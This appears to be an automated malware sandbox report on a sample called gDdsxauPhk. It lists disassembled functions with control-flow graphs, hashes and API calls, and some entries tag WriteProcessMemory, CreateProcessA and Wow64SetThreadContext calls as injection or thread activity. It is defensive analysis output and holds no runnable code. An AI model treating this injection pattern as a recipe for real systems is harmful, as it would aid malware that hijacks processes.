                                                        • Opcode Fuzzy Hash: 8ca87177092eedb9c2d571519db9512239acd6afeb6f0fbacc71b25ac5527fa4
                                                        • Instruction Fuzzy Hash: E15168B0900209CFDB14DFA9D548BEEBBF1EF48314F208569E419A7360CB749984CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19D5F Relevance: 5.1, Strings: 4, Instructions: 98COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 790 6a19d5f-6a19dfa 797 6a19e24 790->797 798 6a19dfc-6a19e08 790->798 801 6a19e2a-6a1a08b 797->801 799 6a19e12-6a19e18 798->799 800 6a19e0a-6a19e10 798->800 802 6a19e22 799->802 800->802 810 6a1a0b5 801->810 811 6a1a08d-6a1a099 801->811 802->801 814 6a1a0bb-6a1a376 call 6d3dde0 810->814 812 6a1a0a3-6a1a0a9 811->812 813 6a1a09b-6a1a0a1 811->813 815 6a1a0b3 812->815 813->815 817 6a1a37c-6a1a38b 814->817 815->814
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 220c95b6b9e8e973d45f42400d239a06ac5e5f18077b7cba4ce073e26f64e4e5
                                                        • Instruction ID: 5b273153b47125007f0dcee7e60e457b4e4a7a2db7b7b5f74bbff16afc87fd9a
                                                        • Opcode Fuzzy Hash: 220c95b6b9e8e973d45f42400d239a06ac5e5f18077b7cba4ce073e26f64e4e5
                                                        • Instruction Fuzzy Hash: 2341D178E01228CFEB68DF64D994B99B7B2BB49300F1080D9E549AB394CB315E85CF42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A12778 Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3237 6a12778-6a127ae 3240 6a12b71-6a12b9c 3237->3240 3241 6a127b4-6a127c7 3237->3241 3253 6a12ba3-6a12bf3 3240->3253 3244 6a127c9-6a127d3 3241->3244 3245 6a127db-6a12801 3241->3245 3244->3245 3245->3253 3254 6a12807-6a1280d 3245->3254 3280 6a12bf5-6a12c09 3253->3280 3281 6a12c14-6a12c1c 3253->3281 3325 6a1280f call 6a12d01 3254->3325 3326 6a1280f call 6a12d28 3254->3326 3256 6a12814-6a1281d 3257 6a12823-6a1283d 3256->3257 3258 6a128ff-6a12903 3256->3258 3263 6a12855-6a12871 3257->3263 3264 6a1283f-6a1284d 3257->3264 3259 6a12913-6a12923 3258->3259 3260 6a12905-6a1290b 3258->3260 3267 6a12925-6a1294e 3259->3267 3268 6a1295a-6a12978 call 6a12368 3259->3268 3260->3259 3278 6a12873-6a1287e 3263->3278 3279 6a128ce-6a128f2 3263->3279 3264->3263 3282 6a1297d-6a12994 3268->3282 3290 6a12880-6a12886 3278->3290 3291 6a12896-6a128a7 3278->3291 3295 6a128f4 3279->3295 3296 6a128fc-6a128fd 3279->3296 3280->3281 3287 6a12996-6a129a4 3282->3287 3288 6a129ac-6a129c8 3282->3288 3287->3288 3305 6a129ca-6a129d5 3288->3305 3306 6a12a3c-6a12a60 3288->3306 3292 6a12888 3290->3292 3293 6a1288a-6a1288c 3290->3293 3301 6a128a9-6a128ac 3291->3301 3302 6a128ae-6a128b1 3291->3302 3292->3291 3293->3291 3295->3296 3296->3258 3303 6a128b4-6a128bb 3301->3303 3302->3303 3308 6a128c1-6a128cc 3303->3308 3312 6a129d7-6a129dd 3305->3312 3313 6a129ed-6a129fa 3305->3313 3316 6a12a62 3306->3316 3317 6a12a6a 3306->3317 3308->3278 3308->3279 3318 6a129e1-6a129e3 3312->3318 3319 6a129df 3312->3319 3314 6a129fc-6a12a08 3313->3314 3315 6a12a0e-6a12a3a 3313->3315 3314->3315 3315->3305 3315->3306 3316->3317 3317->3240 3318->3313 3319->3313 3325->3256 3326->3256
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q$PH^q
                                                        • API String ID: 0-1598597984
                                                        • Opcode ID: 636a6d12a82257a794e3eb3fc9988c5ecc9bb95f705d24f1dec906caca57eee1
                                                        • Instruction ID: 99a5809989433491c6541cac777198d8e285c5712532e0b00768a68fca3573d6
                                                        • Opcode Fuzzy Hash: 636a6d12a82257a794e3eb3fc9988c5ecc9bb95f705d24f1dec906caca57eee1
                                                        • Instruction Fuzzy Hash: C5C1E734A002148FCB54EF68D558AADBBF2FF88310B1545A8E506EF3A1DB31ED85CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19F41 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3327 6a19f41 3375 6a19f41 call 6a1b880 3327->3375 3376 6a19f41 call 6a1b872 3327->3376 3328 6a19f47-6a19f68 3330 6a19d4e-6a19d53 3328->3330 3331 6a19f6e 3328->3331 3332 6a19fb2-6a1a188 call 6a19498 3330->3332 3333 6a19d59-6a19d5a 3330->3333 3331->3332 3345 6a1a189-6a1a276 call 6d36688 3332->3345 3333->3332 3350 6a1a1c3-6a1a27f 3345->3350 3351 6a1a1dd-6a1a2a9 3345->3351 3350->3345 3354 6a1a285-6a1a286 call 6d36808 3350->3354 3358 6a1a2b2-6a1a2b3 3351->3358 3361 6a1a218-6a1a2d3 3354->3361 3358->3350 3367 6a1a305 3361->3367 3368 6a1a2d5-6a1a304 3361->3368 3370 6a1a306 3367->3370 3368->3367 3370->3370 3375->3328 3376->3328
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: 0e84ac9a987ed7134880b61a9a2ac4b0c033db5b5b8bdc5ee5cec3649e7bf1da
                                                        • Instruction ID: 5f7dbd631cc183857dcc5b9b39040b2390696ad96be25df0b804905ece21e1e3
                                                        • Opcode Fuzzy Hash: 0e84ac9a987ed7134880b61a9a2ac4b0c033db5b5b8bdc5ee5cec3649e7bf1da
                                                        • Instruction Fuzzy Hash: 15514978E05218CFDB94EFA8D544BEDBBF6BB49300F205029E60AAB355DB745A44CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19D48 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3378 6a19d48-6a19d53 3380 6a19fb2-6a1a188 call 6a19498 3378->3380 3381 6a19d59-6a19d5a 3378->3381 3393 6a1a189-6a1a196 3380->3393 3381->3380 3394 6a1a1a0-6a1a1ac call 6d36688 3393->3394 3395 6a1a1b2-6a1a276 3394->3395 3398 6a1a1c3-6a1a27f 3395->3398 3399 6a1a1dd-6a1a296 3395->3399 3398->3393 3402 6a1a285-6a1a286 3398->3402 3404 6a1a2a0-6a1a2a9 3399->3404 3408 6a1a20c-6a1a212 call 6d36808 3402->3408 3406 6a1a2b2-6a1a2b3 3404->3406 3406->3398 3409 6a1a218-6a1a2d3 3408->3409 3415 6a1a305 3409->3415 3416 6a1a2d5-6a1a304 3409->3416 3418 6a1a306 3415->3418 3416->3415 3418->3418
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: 7c22fb2c7328ef5e4dbb4d5b6b0e8cb88798ccde97d0e782d9dbbf62a9f45923
                                                        • Instruction ID: 1afad2ecb393d4904300b6630eb165c08a24e6c51699dc9cbe44de1c82c80d46
                                                        • Opcode Fuzzy Hash: 7c22fb2c7328ef5e4dbb4d5b6b0e8cb88798ccde97d0e782d9dbbf62a9f45923
                                                        • Instruction Fuzzy Hash: 2C514A78E05208CFDB94EFA8D544BEDB7B6BB49300F205059E60AAB395DB745A44CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED60A4 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3424 6ed60a4-6ed6145 3426 6ed617e-6ed619e 3424->3426 3427 6ed6147-6ed6151 3424->3427 3434 6ed61d7-6ed6206 3426->3434 3435 6ed61a0-6ed61aa 3426->3435 3427->3426 3428 6ed6153-6ed6155 3427->3428 3430 6ed6178-6ed617b 3428->3430 3431 6ed6157-6ed6161 3428->3431 3430->3426 3432 6ed6165-6ed6174 3431->3432 3433 6ed6163 3431->3433 3432->3432 3436 6ed6176 3432->3436 3433->3432 3441 6ed623f-6ed62f9 CreateProcessA 3434->3441 3442 6ed6208-6ed6212 3434->3442 3435->3434 3437 6ed61ac-6ed61ae 3435->3437 3436->3430 3439 6ed61d1-6ed61d4 3437->3439 3440 6ed61b0-6ed61ba 3437->3440 3439->3434 3443 6ed61bc 3440->3443 3444 6ed61be-6ed61cd 3440->3444 3455 6ed62fb-6ed6301 3441->3455 3456 6ed6302-6ed6388 3441->3456 3442->3441 3445 6ed6214-6ed6216 3442->3445 3443->3444 3444->3444 3446 6ed61cf 3444->3446 3447 6ed6239-6ed623c 3445->3447 3448 6ed6218-6ed6222 3445->3448 3446->3439 3447->3441 3450 6ed6224 3448->3450 3451 6ed6226-6ed6235 3448->3451 3450->3451 3451->3451 3452 6ed6237 3451->3452 3452->3447 3455->3456 3466 6ed6398-6ed639c 3456->3466 3467 6ed638a-6ed638e 3456->3467 3469 6ed63ac-6ed63b0 3466->3469 3470 6ed639e-6ed63a2 3466->3470 3467->3466 3468 6ed6390 3467->3468 3468->3466 3472 6ed63c0-6ed63c4 3469->3472 3473 6ed63b2-6ed63b6 3469->3473 3470->3469 3471 6ed63a4 3470->3471 3471->3469 3474 6ed63d6-6ed63dd 3472->3474 3475 6ed63c6-6ed63cc 3472->3475 3473->3472 3476 6ed63b8 3473->3476 3477 6ed63df-6ed63ee 3474->3477 3478 6ed63f4 3474->3478 3475->3474 3476->3472 3477->3478 3480 6ed63f5 3478->3480 3480->3480
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ED62E6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 7dd1b0185c343a369fd444353f4b0994628ea54499a4b65d67659f659e5d4fef
                                                        • Instruction ID: 74e9dcf2b9cb612c6cede37632d2cbc28df0b2d309b0612440a5732a6dfa4b44
                                                        • Opcode Fuzzy Hash: 7dd1b0185c343a369fd444353f4b0994628ea54499a4b65d67659f659e5d4fef
                                                        • Instruction Fuzzy Hash: BDA16971D00319CFDB60CFA8C845BEEBBB2BF48314F0485A9E849A7250DB749986CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED60B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ED62E6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 013e7b940152152b21cb74f84ca30c8cf722482b04bcff7b3ca9f1686f9d4d30
                                                        • Instruction ID: 9f47f519692450c17ab04143db29130dcfb54def1fc3c59a5274d9a05e7b0017
                                                        • Opcode Fuzzy Hash: 013e7b940152152b21cb74f84ca30c8cf722482b04bcff7b3ca9f1686f9d4d30
                                                        • Instruction Fuzzy Hash: B7916971D00319CFDB50CFA8C845BEEBBB2BF48314F1495A9E858A7250DB749986CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FBCB8 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 007FBF1E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 4e85bac419749aa30885c018987ca548e6f45d00b617b4a75185d302e2724bc7
                                                        • Instruction ID: 095eaf96abc367c839e0229f26b35f35ff24c2d77f645b3d64eb27222eada808
                                                        • Opcode Fuzzy Hash: 4e85bac419749aa30885c018987ca548e6f45d00b617b4a75185d302e2724bc7
                                                        • Instruction Fuzzy Hash: 6D811370A00B098FDB24DF29D44576ABBF1BF88304F10892DD58ADBB50D779E94ACB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 023F2804 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023F2922
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1762855295.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_23f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: df6ae21d732db2b8bfd5590a9408fd74d8a77098e32a2273d8441fb9cb2db841
                                                        • Instruction ID: 6fb70334c0b186d4503e75229e35d37409ce0be1af8362ee29999cf2bde3fea5
                                                        • Opcode Fuzzy Hash: df6ae21d732db2b8bfd5590a9408fd74d8a77098e32a2273d8441fb9cb2db841
                                                        • Instruction Fuzzy Hash: AD51CDB1D00349DFDB14CFAAD984ADEBFB5BF48314F24812AE919AB210D7719885CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 023F2810 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023F2922
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1762855295.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_23f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 0b95543c6e97d55450083251dc4c597ae03f8ac311849eb5d1c79dea00f5be21
                                                        • Instruction ID: 436e5b9cfbc00c4b94ce7d9f79dd41c5af6e464271af342d7c2e3e397598bfa5
                                                        • Opcode Fuzzy Hash: 0b95543c6e97d55450083251dc4c597ae03f8ac311849eb5d1c79dea00f5be21
                                                        • Instruction Fuzzy Hash: 9F41BDB1D00309DFDB14CFAAD984ADEBFB5BF48314F24812AE919AB210D7749885CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 023F1DC4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 023F4EA1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1762855295.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_23f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 1325de5fafb4f0862ced75df4d611dc4bad39d7e4b758168bf6c35bafdd195ff
                                                        • Instruction ID: 348c6733bbd3c9d7dc0cc577589baab7b4be7639ed063a5e66ca5e3105179dd0
                                                        • Opcode Fuzzy Hash: 1325de5fafb4f0862ced75df4d611dc4bad39d7e4b758168bf6c35bafdd195ff
                                                        • Instruction Fuzzy Hash: 014127B8A00205DFCB54CF99D488BABBBF5FB98314F24C459D619AB321D375A840CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007F4538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 007F5DC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 511f5e500c7aea60b104fed59605395a704a359cbbdaf12ec3203418b73e765f
                                                        • Instruction ID: 886952cd429f3f69df5aa19284a47afc3b5c90c9118097605d5c935414cf2c41
                                                        • Opcode Fuzzy Hash: 511f5e500c7aea60b104fed59605395a704a359cbbdaf12ec3203418b73e765f
                                                        • Instruction Fuzzy Hash: DD41E2B0C0071DCBDB24CFA9C884B9EBBB5BF48304F24816AD518AB255DB796945CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007F5D0D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 007F5DC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 8854b8b0d6a220e8ef1f88aa349651db09c41a4da2c3d0500192368db7038e3c
                                                        • Instruction ID: 9fa72b6b0387270b27383f1eb14ec2d4b40f6807b74e3177174b5ac6633fb1ec
                                                        • Opcode Fuzzy Hash: 8854b8b0d6a220e8ef1f88aa349651db09c41a4da2c3d0500192368db7038e3c
                                                        • Instruction Fuzzy Hash: E441D1B0C0061DCFDB24CFA9C884BDEBBB5BF49304F24816AD518AB255DB755986CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 068F81EC Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,068F9EC5,?,?), ref: 068F9F77
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768181256.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_68f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: dd63289258ac5548c54a40ebfab6d03dd1e9cc7f714d6bba37530efad80a97d0
                                                        • Instruction ID: 8d7b6e9c37e6bf83dd8192155f0756fbd60a80035471d9c128f8eafab7710483
                                                        • Opcode Fuzzy Hash: dd63289258ac5548c54a40ebfab6d03dd1e9cc7f714d6bba37530efad80a97d0
                                                        • Instruction Fuzzy Hash: DE31E2B5D002099FDB50CF9AD884ADEFBF4FB48310F14842AEA19A7210D374A944CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5A22 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ED5AB8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: c7e9f9e1a27c914f9d887f73910afb1649801829c9d6948bdf4ee436c787c601
                                                        • Instruction ID: 5e48139b46c45b55cbe65e8576cf44c747884b5389861604e6d521f63dc33d68
                                                        • Opcode Fuzzy Hash: c7e9f9e1a27c914f9d887f73910afb1649801829c9d6948bdf4ee436c787c601
                                                        • Instruction Fuzzy Hash: 8A2146B19003599FCB10CFA9C885BEEBFF5FF48310F108429E959A7240C7789944CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 068F9ED8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,068F9EC5,?,?), ref: 068F9F77
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768181256.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_68f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: 77f888837332cad3dbee418c56ce4f56819bab741d8eb5a8b6d65ce530ff94a0
                                                        • Instruction ID: 941c307057bc39de270647d20714409d63aca7773193d3c49348918634d39339
                                                        • Opcode Fuzzy Hash: 77f888837332cad3dbee418c56ce4f56819bab741d8eb5a8b6d65ce530ff94a0
                                                        • Instruction Fuzzy Hash: 5F31C0B5D012499FDB50CF9AD884ADEBBF5FF48320F14842AEA19A7311D774A944CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5A28 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ED5AB8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 01da3d163821af04dfbcd44ea950d4356767d6e7afa5096ec03f3bb83d73bd23
                                                        • Instruction ID: 6a4593d421921412b4ab1618a017c94a07e153b3da5c61e58ca2a4d43d7356f2
                                                        • Opcode Fuzzy Hash: 01da3d163821af04dfbcd44ea950d4356767d6e7afa5096ec03f3bb83d73bd23
                                                        • Instruction Fuzzy Hash: AA2125B19003599FCB10CFA9C885BEEBBF5FF48314F10842AE959A7250C7789945CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FE1A0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FE22F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 961bd5704f035c24d8e993b03416c62d4d6202c3aef26b79371dd70b2f6874c6
                                                        • Instruction ID: 4a7f02f1d19b6b20971611a755e30664f0069f338368574a72ca412b3d95909f
                                                        • Opcode Fuzzy Hash: 961bd5704f035c24d8e993b03416c62d4d6202c3aef26b79371dd70b2f6874c6
                                                        • Instruction Fuzzy Hash: DE21E5B59002189FDB10CFA9D984AEEBBF8FB48310F14841AE954A7350D378A944CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5B11 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ED5B98
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: ba030c0d6814e2cf91f245de2ad4e7e333e6c3b7e478eecca2c0e4d1687bbb2c
                                                        • Instruction ID: 656eae4aab356d4fa64304e400cad3d4724dc000e4e7d0242733956712f777f5
                                                        • Opcode Fuzzy Hash: ba030c0d6814e2cf91f245de2ad4e7e333e6c3b7e478eecca2c0e4d1687bbb2c
                                                        • Instruction Fuzzy Hash: 0C2128B1C003599FDB10CFA9C885AEEBBF5FF88310F10842AE959A7250C7749955DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5888 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED590E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 98d81abbc47847d405971afe46fa8e0e904874f5d12239235cfc0a53b8647772
                                                        • Instruction ID: 2e2a09a798db45d5c372cc8ba4fe4bbfc8b6a8151c503200ef75ebb0d8e777ff
                                                        • Opcode Fuzzy Hash: 98d81abbc47847d405971afe46fa8e0e904874f5d12239235cfc0a53b8647772
                                                        • Instruction Fuzzy Hash: C12137B5D003098FDB10DFAAC4857EEBBF5EF88324F14842AD559A7250C7789946CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5B18 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ED5B98
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: b40d7b17550d94bd951a25bfc4e722e0780afb4980831a5f3f6cf7addc28abdc
                                                        • Instruction ID: 1d799a78605e39c1d756bc8dafbaae09b76973765d5cc8935cd863cc26258a57
                                                        • Opcode Fuzzy Hash: b40d7b17550d94bd951a25bfc4e722e0780afb4980831a5f3f6cf7addc28abdc
                                                        • Instruction Fuzzy Hash: 9721E4B19003599FCB10DFAAC885AEEBBF5FF48320F10842AE559A7250C7789945CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5890 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
